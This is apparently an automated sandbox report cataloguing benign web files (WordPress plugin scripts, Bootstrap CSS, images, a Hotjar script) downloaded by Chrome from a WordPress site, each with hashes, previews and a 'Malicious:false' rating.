                                                                                                          Preview:"use strict";.function woof_init_mselects() {.. if (woof_select_type == 'chosen') {. jQuery('select.woof_mselect').chosen();. } else if (woof_select_type == 'selectwoo') {. try {. jQuery('select.woof_mselect').selectWoo();. } catch (e) {. console.log(e);. }. }.. jQuery('.woof_mselect').change(function (a) {. var slug = jQuery(this).val();. var name = jQuery(this).attr('name');.. //fix for multiselect if in chosen mode remove options. if (woof_select_type == 'chosen') {. var vals = jQuery(this).chosen().val();. jQuery('.woof_mselect[name=' + name + '] option:selected').removeAttr("selected");. jQuery('.woof_mselect[name=' + name + '] option').each(function (i, option) {. var v = jQuery(this).val();. if (jQuery.inArray(v, vals) !== -1) {. jQuery(this).prop("selected", true);. }. });. }.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (42889), with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):124272
                                                                                                          Entropy (8bit):5.552390150563906
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:BB3xC6/I/66Q1+sxBsWGXkWRqrlv7j5X5L3T8s+Amum28IycgtbwvZZ9IHsUq0Kn:K66U+9UWRW7Bd8s+3umck6Z/IMln
                                                                                                          MD5:45158046DA12A8625B17FABCA990D080
                                                                                                          SHA1:366F30392BDE37BF0EEC5C7DE4EC8BE5498D35E2
                                                                                                          SHA-256:87664D848161D3A5BF83A511F4F483DC05E8472D06AEDD5111488D267AF298BB
                                                                                                          SHA-512:88EF1C748B6251A489A3159B9C9A86A301840E70954D92D552D304C12CF3459CD07C609E56BC5E5C23BF87D8775A2EF861B724FE8348378FE0E27D02FFB8C3BE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:!function(t){var e={};function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var i in t)n.d(r,i,function(e){return t[e]}.bind(null,i));return r},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=1)}([function(t,e){t.exports=jQuery},function(t,e,n){n(2),n(6),t.exports=n(4)},function(t,e,n
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", progressive, precision 8, 2560x1440, components 3
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):323612
                                                                                                          Entropy (8bit):7.973024922328179
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:YgOdpN9VT4vUieMxg0LphQbQlPNRnT6e4M8yCRaylf2Pi+MScnz5jOPY61u:0j9d+eo/DOs/nTmMgaG71QY3
                                                                                                          MD5:29EF2A1A2E34039CE56AA4C6469F6655
                                                                                                          SHA1:CAF3E4C36AE13E3B9F73B40697D4D1019660C4BC
                                                                                                          SHA-256:261C30323F7676FB0F1523012B9A5B857125FA4D3BD484FAA016042450B28957
                                                                                                          SHA-512:A4A6D49100E18C58258696D3E634B1D52B95106E528CD399D2FFEF686A4174F962F5B988B156A17E2AB1C9E42ABE0DDB98B993BF6E6D4497F5D8AFD398E4E281
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2022/10/SLIDER-4-scaled.jpg
                                                                                                          Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".............................................................................P.5)...I.H.a...I.V`...4..f....#...]{.....3?.../..W.^..d.`..=.....?..z.KR.z...G....:X..e..;.....^.0A.eU.....^;..98...c.bymW...i.....4........./BXuT.dU.,...R.o5<...<...VU.g...|.{h...<.......-.....OD....W......h.NoJ0.z^...z.w.iNm...............`.................&...b. i. .......................L....q..e6..Qd.2#.L..@.`.J,..1.....$...@........ b.&..............@...... `....C..Q..R.E..b.d>.3..$.......O..y..2.D.l.......=C.Y`,(...N.4y.7S..}....g..N..g.).y+..K...\u...7w.........{.f.u..Rt".\.I\x.=G....W5;3.V.....:.......7....<..Yl..Ue.._..;m$k#.W..?>.._...x.9........!..i..]q.S.o..-g.......]..W...{;k.R..sj..1.h...b`................ .. h....h......b`.........4.0....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (1083)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1284
                                                                                                          Entropy (8bit):5.120305588181906
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:NVNdp+zAgb6XGx5EXT+ui3gFAlRFU+FMilTT3ygA+Pkn8A+Pk5n:NVNd8HH3dlRF5uilTTfJPk8JPk5
                                                                                                          MD5:ED130C8D00BA37D0E75E013974D88F75
                                                                                                          SHA1:366C717C004578EC0AC0D4390021D07114A26125
                                                                                                          SHA-256:2B48BE97458E30F257FC46FB5E93548F35DD52FC4C91BA441DA504BA89A5C45E
                                                                                                          SHA-512:877999E20F90FA3E873533E34F7774C28DC499211B7175065FA52B4BC1407CF6AD9DD6AD1236017DA6D0BBB4289333D7AC0E791A41EB8DF4F019107F55D671AC
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * jQuery UI Touch Punch 0.2.3. *. * Copyright 2011.2014, Dave Furfero. * Dual licensed under the MIT or GPL Version 2 licenses.. *. * Depends:. * jquery.ui.widget.js. * jquery.ui.mouse.js. */.!function(t){var o,e,u,n;function c(o,t){var e,u;1<o.originalEvent.touches.length||(o.preventDefault(),e=o.originalEvent.changedTouches[0],(u=document.createEvent("MouseEvents")).initMouseEvent(t,!0,!0,window,1,e.screenX,e.screenY,e.clientX,e.clientY,!1,!1,!1,!1,0,null),o.target.dispatchEvent(u))}t.support.touch="ontouchend"in document,t.support.touch&&(o=t.ui.mouse.prototype,e=o._mouseInit,u=o._mouseDestroy,o._touchStart=function(o){!n&&this._mouseCapture(o.originalEvent.changedTouches[0])&&(n=!0,this._touchMoved=!1,c(o,"mouseover"),c(o,"mousemove"),c(o,"mousedown"))},o._touchMove=function(o){n&&(this._touchMoved=!0,c(o,"mousemove"))},o._touchEnd=function(o){n&&(c(o,"mouseup"),c(o,"mouseout"),this._touchMoved||c(o,"click"),n=!1)},o._mouseInit=function(){var o=this;o.element.on({touchstar
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 7680 x 4320, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2477461
                                                                                                          Entropy (8bit):7.680552273115579
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:rw7RmuhNxNo8sxCZUfy2IGPL+bZLiPHp1Cybcyayi/aFtV1bo0S1PjATrDB/31Xb:+RmuhXND0CZU8UK+PHp0Byli/aFtV1bb
                                                                                                          MD5:5B60672DE6B0AE6171FA790B9BB1BA8C
                                                                                                          SHA1:5D2C22CF5CA06EA0DCA7FD7C5E1ECE0CBA975F65
                                                                                                          SHA-256:3C99502F3893AD75AB4040645A0C2C8D2F8183A0414776922213F149AC9D0964
                                                                                                          SHA-512:991973D83631DF824DE1DE820F6FC605F165B330E135DA696291792811889CDBF81961DFB618EBDBB0E862E837B8970BB2B8D93D1E0F7081AE811E2962DA8828
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2024/09/Asset-2@4x.png
                                                                                                          Preview:.PNG........IHDR.....................pHYs..,J..,J.wztM.. .IDATx....r.L..X...U.....z.....z-.=..+.t.E........A.........?.."x...t......d.."<Me|C...G....+s0......t..y...,....._.....<y<..i,./....MSy..z[..%.o]{....=.(..3...V.\..=.....)._.W..q,.....:|,...[.|.A..u...1.{...g...,.....?u...2.....)....c..qj.G_..g..2f{^2?...._./q~.7UG...1_f.g....y}...+N...._.?.......[._3....I.'..9_....1._..u....8.o.x...Z..!..q..G9..n..Y....3...ky......3...s..s<t1_..W.....[...Z..2.....".....#..........}.U........<..{.x.g=.]v...u..5.....>..V........._.{.....^.....F....mm....W....em.k?...k.......m}.z...~z..8......X...&.?......Nk...j...[._...K[.7...4...{..k..J.o[..9.....xd.W..`...^}.......~........-k..~.......r..j........[.]......i..../fk....U.._..?~.V.].~.g..........<}...........n}.st{...,..~...w..~m{.]......7_..o}....o........k...5~..9z~:.......w......-..N............................../..................................~................................q....<.'.C....y...8N
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60554
                                                                                                          Entropy (8bit):4.536601709264332
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:SP3uQPHtePui9BtZy5I/ox7AWPjgmcIX0ZDwnqto3bj+p+e4JZTh9xoct8vbP0aO:L96xU2jOQi+JmJ21by3HY33Nf4Fi
                                                                                                          MD5:592C33238192E558C6BC01AB4897034A
                                                                                                          SHA1:C99D5C72D4A26C99112BD13CE58416AC461C4C19
                                                                                                          SHA-256:D510064A15E8A07E28305FE1CBB7BD22BAA01076D25DC14669914727D39A38D7
                                                                                                          SHA-512:34D273FA0F43DD53A9E7B5984E2DCE1E9544CC239D13A4B6EEA4B82C868F3011566DCAC9AF8C406B3C5968089DB12DEA0F0148C7805B47D658B245844ABC9006
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:"use strict";.var woof_redirect = '';//if we use redirect attribute in shortcode [woof].var woof_reset_btn_action = false;..jQuery(function () {. try. {. woof_current_values = JSON.parse(woof_current_values);. } catch (e). {. woof_current_values = null;. }. if (woof_current_values == null || woof_current_values.length == 0) {. woof_current_values = {};. }..});..//***.if (typeof woof_lang_custom == 'undefined') {. var woof_lang_custom = {};/*!!important*/.}.if (typeof woof_ext_filter_titles != 'undefined') {. woof_lang_custom = Object.assign({}, woof_lang_custom, woof_ext_filter_titles);.}..jQuery(function ($) {. jQuery('body').append('<div id="woof_html_buffer" class="woof_info_popup" style="display: none;"></div>');.//http://stackoverflow.com/questions/2389540/jquery-hasparent. jQuery.extend(jQuery.fn, {. within: function (pSelector) {. // Returns a subset of items using jQuery.filter. return this.filte
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2047
                                                                                                          Entropy (8bit):4.555981853453777
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:73bMGvdswKn4YQwIEmie1jzi1SgTiS2Z9LDROLsqN2KGQf:rokdsBQ/EcvSe1ORN2HQf
                                                                                                          MD5:90BFF8B5E70854D873E53E3337349D96
                                                                                                          SHA1:01726220EBE9E5E3AD06BF0823995B5A6F15C9D7
                                                                                                          SHA-256:43841FE177E4EEFB459A3CCE0901D9B77E7C224F6FACC264BEF5C2DFD5FB3461
                                                                                                          SHA-512:47A263A8489D6B13385E39D762E0679397D034C7D036A90061C4B3773C7BAE6B4E67E0A0A8B3725AE0A20CCDF9830F93BE158099EC5DE7092574D78D30AC5BD0
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/html_types/mselect.js?ver=3.3.0
                                                                                                          Preview:"use strict";.function woof_init_mselects() {.. if (woof_select_type == 'chosen') {. jQuery('select.woof_mselect').chosen();. } else if (woof_select_type == 'selectwoo') {. try {. jQuery('select.woof_mselect').selectWoo();. } catch (e) {. console.log(e);. }. }.. jQuery('.woof_mselect').change(function (a) {. var slug = jQuery(this).val();. var name = jQuery(this).attr('name');.. //fix for multiselect if in chosen mode remove options. if (woof_select_type == 'chosen') {. var vals = jQuery(this).chosen().val();. jQuery('.woof_mselect[name=' + name + '] option:selected').removeAttr("selected");. jQuery('.woof_mselect[name=' + name + '] option').each(function (i, option) {. var v = jQuery(this).val();. if (jQuery.inArray(v, vals) !== -1) {. jQuery(this).prop("selected", true);. }. });. }.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (842)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):847
                                                                                                          Entropy (8bit):5.16876338659499
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:WxiQ34EstMBHslgT1d1uawBuoBN2t2t2t2t2t2t2tomffffffo:WxinOKlgJXwBuSNYYYYYYYomffffffo
                                                                                                          MD5:CEB7E193AE7E8A63139F7226E8FAAECC
                                                                                                          SHA1:742FE5702CAFCCB378720AE0DBD7C152568ACB8A
                                                                                                          SHA-256:597CE909C04DFA71F61DF08983C28B39E7F473BEFF636665755FCD5FF9384F62
                                                                                                          SHA-512:BF543460122BBAE8421A1288E35E64493039A7DDC4CB60B069914527680C5194C85098A66654DA6BFC8A4060F04E47DB9E2A2B4B330D9107DC8B52E59876BD30
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                          Preview:)]}'.["",["subaru car dealership","what we do in the shadows series finale","sony playstation wrap up 2024","iowa hawkeyes vs iowa state cyclones","meteor shower geminids","us navy ford class carrier debate","gm cruise robotaxi","snowfall weather forecast"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65324)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):155758
                                                                                                          Entropy (8bit):5.06621719317054
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:b/xImT+IcCQYYDnDEBi83NcuSEk/ekX/uKiq3SYiLENM6HN26F:b/Riz7G3q3SYiLENM6HN26F
                                                                                                          MD5:A15C2AC3234AA8F6064EF9C1F7383C37
                                                                                                          SHA1:6E10354828454898FDA80F55F3DECB347FD9ED21
                                                                                                          SHA-256:60B19E5DA6A9234FF9220668A5EC1125C157A268513256188EE80F2D2C8D8D36
                                                                                                          SHA-512:B435CF71A9AE66C59677A3AC285C87EA702A87F32367FE5893CF13E68F9A31FCA0A8D14F6A7D692F23C5027751CE63961CA4FE8D20F35A926FF24AE3EB1D4B30
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/vendors/bootstrap/css/bootstrap.min.css?ver=4.3.1
                                                                                                          Preview:/*!. * Bootstrap v4.3.1 (https://getbootstrap.com/). * Copyright 2011-2019 The Bootstrap Authors. * Copyright 2011-2019 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (1391)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1426
                                                                                                          Entropy (8bit):5.2713128211306
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Q77Beacy8766a2IFav3gRR46UUU6DXEhL38AX34jPrgwXopq17hgn:Q7DHH2IuggP6DXEF36oo8
                                                                                                          MD5:19D386C9004E54941C1CC61D357EFA5D
                                                                                                          SHA1:0A77594006C8D86FDCC0ADBC2B9AECAEF3869586
                                                                                                          SHA-256:3BC6467A95CEC8FA516C6F5F69E1301E37E16F9BB1046FE7756729249F901B95
                                                                                                          SHA-512:7811CF6BABB4DF41707F97D1BD65337B5AD7AAEDFF301FCEDB90FB7773FA9876F52458AA03A576910F6126384599EF25F8DE76EE309C22E1914D9CF444AEFB6F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/wp-util.min.js?ver=6.7.1
                                                                                                          Preview:/*! This file is auto-generated */.window.wp=window.wp||{},function(s){var t="undefined"==typeof _wpUtilSettings?{}:_wpUtilSettings;wp.template=_.memoize(function(e){var n,a={evaluate:/<#([\s\S]+?)#>/g,interpolate:/\{\{\{([\s\S]+?)\}\}\}/g,escape:/\{\{([^\}]+?)\}\}(?!\})/g,variable:"data"};return function(t){if(document.getElementById("tmpl-"+e))return(n=n||_.template(s("#tmpl-"+e).html(),a))(t);throw new Error("Template not found: #tmpl-"+e)}}),wp.ajax={settings:t.ajax||{},post:function(t,e){return wp.ajax.send({data:_.isObject(t)?t:_.extend(e||{},{action:t})})},send:function(a,t){var e,n;return _.isObject(a)?t=a:(t=t||{}).data=_.extend(t.data||{},{action:a}),t=_.defaults(t||{},{type:"POST",url:wp.ajax.settings.url,context:this}),(e=(n=s.Deferred(function(n){t.success&&n.done(t.success),t.error&&n.fail(t.error),delete t.success,delete t.error,n.jqXHR=s.ajax(t).done(function(t){var e;"1"!==t&&1!==t||(t={success:!0}),_.isObject(t)&&!_.isUndefined(t.success)?(e=this,n.done(function(){a&&
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (4921)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):4960
                                                                                                          Entropy (8bit):5.388907220723694
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:B1N6AUjqn93zCpxYf8oqallarNVwbVLXkqfjQezovOP8S2:TN6j493GPRjNwdXkymOUS2
                                                                                                          MD5:E0B0728EF9A032F266A452E8756EED80
                                                                                                          SHA1:32092AD198ED2496B3DC52A23E8C7C1091B06B84
                                                                                                          SHA-256:9D02623E246A2E8299B30DA9FFA8AADD8B53CD63DB56A0F1237BE26244D05638
                                                                                                          SHA-512:0E9A0BB10DBBA6FBE02F4A265373896DA710A2B29B67AAA4A4A66ACA1DBC89011B073F60BBD4DB08532A738CDDEDD0C3797A1B70895F00AD9142CA5478A278DB
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.6.1
                                                                                                          Preview:/*! elementor - v3.6.1 - 23-03-2022 */.(()=>{"use strict";var e,r,_,t,i,a={},n={};function __webpack_require__(e){var r=n[e];if(void 0!==r)return r.exports;var _=n[e]={exports:{}};return a[e](_,_.exports,__webpack_require__),_.exports}__webpack_require__.m=a,e=[],__webpack_require__.O=(r,_,t,i)=>{if(!_){var a=1/0;for(u=0;u<e.length;u++){for(var[_,t,i]=e[u],n=!0,c=0;c<_.length;c++)(!1&i||a>=i)&&Object.keys(__webpack_require__.O).every((e=>__webpack_require__.O[e](_[c])))?_.splice(c--,1):(n=!1,i<a&&(a=i));if(n){e.splice(u--,1);var o=t();void 0!==o&&(r=o)}}return r}i=i||0;for(var u=e.length;u>0&&e[u-1][2]>i;u--)e[u]=e[u-1];e[u]=[_,t,i]},_=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,__webpack_require__.t=function(e,t){if(1&t&&(e=this(e)),8&t)return e;if("object"==typeof e&&e){if(4&t&&e.__esModule)return e;if(16&t&&"function"==typeof e.then)return e}var i=Object.create(null);__webpack_require__.r(i);var a={};r=r||[null,_({}),_([]),_(_)];for(var n=2&t&&e;"object"==typeof
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (19082)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):19128
                                                                                                          Entropy (8bit):4.5664248896753055
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:rF8XHGK+JRxSe6OSfNVsXZLUCpZETvebAmR+srfSbqkbQC4u/DUBMQh:CmK+JRQcx5ZETGNREmk4uA
                                                                                                          MD5:50BE31853049E4B4A10C277D5F95EB75
                                                                                                          SHA1:AC2DFFC0C65AD6B209FEDF2169D0C50EB4119A3E
                                                                                                          SHA-256:B651D87EF113CBA0C8EC8A33BFDB694171EFFEBA56B20BE12E3C77FC15F6AE9F
                                                                                                          SHA-512:D4E784C23393F5DEC68871A57EBE42BB7B44112010774602B4A4F97BAAE37C6A40D405F71A624183F2597136141B79E9AC902C4835D34BF09A122978F71F8D4E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.15.0
                                                                                                          Preview:/*! elementor-icons - v5.15.0 - 30-01-2022 */.@font-face{font-family:eicons;src:url(../fonts/eicons.eot?5.15.0);src:url(../fonts/eicons.eot?5.15.0#iefix) format("embedded-opentype"),url(../fonts/eicons.woff2?5.15.0) format("woff2"),url(../fonts/eicons.woff?5.15.0) format("woff"),url(../fonts/eicons.ttf?5.15.0) format("truetype"),url(../fonts/eicons.svg?5.15.0#eicon) format("svg");font-weight:400;font-style:normal}[class*=" eicon-"],[class^=eicon]{display:inline-block;font-family:eicons;font-size:inherit;font-weight:400;font-style:normal;font-variant:normal;line-height:1;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@keyframes a{0%{transform:rotate(0deg)}to{transform:rotate(359deg)}}.eicon-animation-spin{animation:a 2s infinite linear}.eicon-editor-link:before{content:'\e800'}.eicon-editor-unlink:before{content:'\e801'}.eicon-editor-external-link:before{content:'\e802'}.eicon-editor-close:before{content:'\e803'}.eicon-editor-list-ol:before{cont
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:data
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):5126
                                                                                                          Entropy (8bit):7.957513975412577
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:6ccq7FABkCAEZRZ/cKyo0m6kPP1iqJjPDj20nUAXET6Yq582GpdPOJUn:6X2C5ZP/cKOhkPsqJjf582YPkUn
                                                                                                          MD5:F485FFB381BC13DE8CA39BE5AE12B10D
                                                                                                          SHA1:9DB60D69BB9D136DAB05D5AC35AE49F29CD0AE36
                                                                                                          SHA-256:8EFB6E853BEBFDC367BFBE43180AE7183478000C6BFF4C82C965B6A84C4088B2
                                                                                                          SHA-512:F61C31ACF070924F6BF7F45EEA0E52236111DEB695088B66AA6B04806507D3F578AD1B12F0F682E1FDE4D4B73B1CC96B6F8B0B29B73B595664B5A76524728DDE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://static.hotjar.com/c/hotjar-3301862.js?sv=7
                                                                                                          Preview:.(.!..........m....|..K..(6[.h.Y.TSY'pW..%.cPbd.$'M.:35...[.7z5..E......w{..H.Y0...!..I..>....)..M.s....^.(l-..t.+7..&PBNY._.._j.K.^...`...uQK.<C.."..$...@,...#...~..c......{e.v.Mv..$...:(.s.jFm."6|<...6^..n\...o,f|.P.O...hZ........:.k........Dc#.r...fgd&phut..7S.9.....B..(g.....Qo6'b....^.[..j....!.L.5>.....Te;..F...Uv|.R...f..K...1.......*;....T..smr..AT....F%.c]UO..-K.....G...V..W.Lz..2#.Q..J....v....7....h.].f.........k.....[..c...LG..v..L^ ...R)....(......YY..;C.8.....w..:L..G...........d.=D.S..../....J....X.%.y l......U.S.s2..=.g.P.=..:..Jd..]...4e'?..r&w..Ca..2W.......p...C.~.. .d2."N..I.$Wir9,.I....d.9...(...0-.............H..._..1....%...y.sO.ecr.k.!.....k"..l.DJz.[...t..U...o|......5...T.....`;1.I..rw.;...R.9..#<@8..ED..h..J.=E.D.V&S..g..=;..7...f.9..l.m.....z)h.S....K.....t.S.7..(.(g......(.......fa.iC.p..0..`X.KJ.v.$=I...y.k{JY....|.j.A{......g..(.Ii.]..\U.......$P.nz5..z......~E...[..\_w....c..Tt.C..9a..M..x...i..W=R
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 32 x 32, 8-bit gray+alpha, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):552
                                                                                                          Entropy (8bit):7.515583549045739
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:6v/7FGKnMQZRv9NIzgNkarOBOoDTghZ4OLUzWnU4KhNvWhaNE3w0I:OGKnMQZ50gxOwMTgh70Wn36VWuE3s
                                                                                                          MD5:1CBA01736A152F08BA1804CCDF26EA7D
                                                                                                          SHA1:C0DE3FA29D5C4D9C37D767A3C81B1B71E070A26F
                                                                                                          SHA-256:136E61B06AFF51781F423C992F49229C3DDB882657E18F1603AB3A08D9CAF072
                                                                                                          SHA-512:C1A2135AF17DF98C1F8ACB232FC2E84D62433DD480F27DE452D0C6376A10D2561829310A2C9883F4E82A4B60AB3B1C708054E1C40BC042835E02D9316BC64599
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2021/10/cropped-Progetto-senza-titolo-2021-10-27T000238.589-1-32x32.png
                                                                                                          Preview:.PNG........IHDR... ... ......s......IDATH...R.Q...$ .................\.....x...66..1.....A...2.OTBl..K046.n.gv.{v.,....u_.<q^F.+..y....A3`......4..jC&...V.^..xj..+y.ze#.W..h.`...0......}.z.=v.&.6..Y...[.k...9...C..Y.......!@...../`.7...X._.].F...V..C.......O....C...).f}.UH....4.:.Zw.*.,..7..M..'.....s_A.v.8`.}....`.*..........{S@:.+Y.}..U......q.6....+p..mpS...&.^e;A.+..o...L..XD..}.iI.e.Ud.Z.C...*'e0n....%..%C./.4s.... .e!2g..!)+oW'."k....T|.Xf..m.Z.0}l...s...t.-E....*.S..l'..5..=.Wq..XU.q... ?.;..z.}......IEND.B`.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (771), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):771
                                                                                                          Entropy (8bit):4.987651578772006
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:owzOKRzEPIiI1fI6VKcyLrbkfVwSvprGR3/Ri1tdzCj:H+H6fI+KcyjYRA3IEj
                                                                                                          MD5:2399EF783701F73C399589AE95298B0F
                                                                                                          SHA1:3E1F2A7AC9DCB2B50B1F1CF768441E46FD9F62EE
                                                                                                          SHA-256:2DEA57483641F8762937DFD9B09126A9B21C88BD3D7486186003E0BBB9043145
                                                                                                          SHA-512:50F1C2B16C8C2FC62C504A33529DCEF3FDBDD1533206C8779772CBBA1A336C7C5BBB533A35F99E559ADED3D1BF0C858C10A04EC083969F47A29DEAC92E366FA1
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/wpforms-lite/assets/js/integrations/elementor/frontend.min.js?ver=1.8.9.5
                                                                                                          Preview:"use strict";var WPFormsElementorFrontend=window.WPFormsElementorFrontend||function(o,e,n){var r={init:function(){r.events()},events:function(){e.addEventListener("elementor/popup/show",function(e){e=n("#elementor-popup-modal-"+e.detail.id).find(".wpforms-form");e.length&&r.initFields(e)})},initFields:function(e){wpforms.ready(),"undefined"!=typeof wpformsModernFileUpload&&wpformsModernFileUpload.init(),"undefined"!=typeof wpformsRecaptchaLoad&&("recaptcha"===wpformsElementorVars.captcha_provider&&"v3"===wpformsElementorVars.recaptcha_type?"undefined"!=typeof grecaptcha&&grecaptcha.ready(wpformsRecaptchaLoad):wpformsRecaptchaLoad()),n(o).trigger("wpforms_elementor_form_fields_initialized",[e])}};return r}(document,window,jQuery);WPFormsElementorFrontend.init();
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (18984)
